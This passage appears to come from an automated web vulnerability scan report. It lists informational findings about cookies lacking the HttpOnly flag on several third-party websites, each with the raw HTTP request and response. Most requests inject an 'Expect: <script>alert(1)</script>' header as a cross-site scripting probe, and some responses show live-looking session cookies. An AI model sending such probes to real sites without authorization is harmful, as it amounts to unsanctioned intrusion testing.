User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.optimahealth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:52 GMT
Set-Cookie: BIGipServerSI_www.optimahealth.com_pool=2365843107.0.0000; path=/


15.220. http://www.oxforddictionaries.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oxforddictionaries.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oxforddictionaries.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:40:37 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 481
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: LB-Persist=5/hvbuwTnX/+z/tPpMUtQ/Kjihcnd5dXrpCXU9e2tfJjMwdPTPiyCji/ewFkw31mIxQ2XQwjRSqNgZ4=; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.221. http://www.pahomepage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pahomepage.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pahomepage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:04:52 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 473
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerDallasPool=378933258.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.222. http://www.paintball-online.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paintball-online.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paintball-online.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=y3tbkcav2lyzasqevyg15y2y; path=/; HttpOnly
Set-Cookie: cart_guid={9aa6c9cb-6315-4903-92cb-3534330a0ea5}; expires=Thu, 02-Jun-2011 07:00:00 GMT; path=/
Cache-Control: private
Content-Length: 0


15.223. http://www.paulmccartney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paulmccartney.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paulmccartney.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 04 May 2011 02:10:42 GMT
Set-Cookie: X-Mapping-fjhppofk=BC54EC552D9E04A8F87383FEEBA35AD2; path=/
Content-Length: 389

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.224. http://www.pavilionconcerts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pavilionconcerts.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pavilionconcerts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Date: Wed, 04 May 2011 04:01:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Page.aspx/pageId/37150/page-not-found.aspx
Set-Cookie: ASP.NET_SessionId=0ufd25nolpwam2550ipqis45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 168
Set-Cookie: Coyote-2-a640597=a64051d:0; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPage.aspx%2fpageId%2f37150%2fpage-not-found.aspx">here</a>.</h2>
</body></html>

15.225. http://www.pets-seo-services.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pets-seo-services.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pets-seo-services.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 02:31:14 GMT
Content-Type: image/vnd.microsoft.icon
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Content-Length: 0
CF-Cache-Status: EXPIRED
Expires: Wed, 04 May 2011 04:31:14 GMT
Cache-Control: public, max-age=7200
Set-Cookie: __cfduid=d4e5031c614dfe6a7eccf8fc6a83e0d3e1304476274; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.pets-seo-services.com
Set-Cookie: __cfduid=d4e5031c614dfe6a7eccf8fc6a83e0d3e1304476274; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.pets-seo-services.com


15.226. http://www.photos-naturistes.fr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.photos-naturistes.fr
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.photos-naturistes.fr
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: 300gp=R3396016315; path=/; expires=Fri, 06-May-2011 15:38:45 GMT
Date: Wed, 04 May 2011 03:24:12 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.227. http://www.ppg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ppg.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ppg.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Set-Cookie: PRD.PPG_HRDIRECT2_COOKIE=R3081022372; path=/
Date: Wed, 04 May 2011 02:30:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 02:30:02 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

15.228. http://www.propertyminder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.propertyminder.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.propertyminder.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:54:19 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-c0a80164=c0a8012b:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.229. http://www.quantumjumping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?whisper_action=1&target=Style&request=css HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:56 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script
...[SNIP]...

15.230. http://www.quantumjumping.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/ HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmx_k_180318845=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:53 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 113180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

15.231. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css?ver=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:58 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:59 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:53:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 35988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

15.232. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=index HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:56 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:55 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:56 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 137

#item_2 {
   width: 250px;
   height: 115px;
   }

#item_1 {
   width: 640px;
   height: 115px;
   }

#item_348 {
   width: 960px;
   height: 115px;
   }


15.233. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:55 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:57 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 6258


div#wrapper                                                        { margin:0px auto; width:960px; clear:both; border: 1px solid #333; }
div#container                                                    { width:960px; }
.header-outside div#wrapper                                        { border-width: 0 1px 1
...[SNIP]...

15.234. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:56 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:57 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 4516


.arial                            {font-family: Arial, sans-serif;}
.helvetica                        {font-family: Helvetica, sans-serif;}
.taho
...[SNIP]...

15.235. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:23 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:24 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

15.236. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:28 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:29 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

15.237. http://www.quantumjumping.com/customers/support/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customers/support/article?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
